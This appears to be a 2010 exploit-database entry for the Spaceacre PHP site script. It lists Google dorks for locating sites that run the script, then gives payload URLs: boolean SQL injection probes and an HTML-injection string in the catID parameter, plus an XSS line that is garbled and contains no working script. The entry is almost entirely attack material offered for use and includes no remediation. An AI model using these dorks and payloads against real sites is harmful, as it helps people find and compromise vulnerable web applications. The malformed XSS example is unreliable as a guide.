[] NeoSense

Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection

Author: CoBRa_21
type: webapps
platform: php
port: 
date_added: 2010-05-25 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

-------------------------------------------------------------------------------------------

Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://www.spaceacre.com

Dork 1: inurl:cat1.php?catID= "Spaceacre"

Dork 2: intext:"Designed by Spaceacre"

-------------------------------------------------------------------------------------------

SQL Injection:

http://localhost/[path]/index.php?catID=1 and 1=2
http://localhost/[path]/index.php?catID=1 and 1=1
-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.

-------------------------------------------------------------------------------------------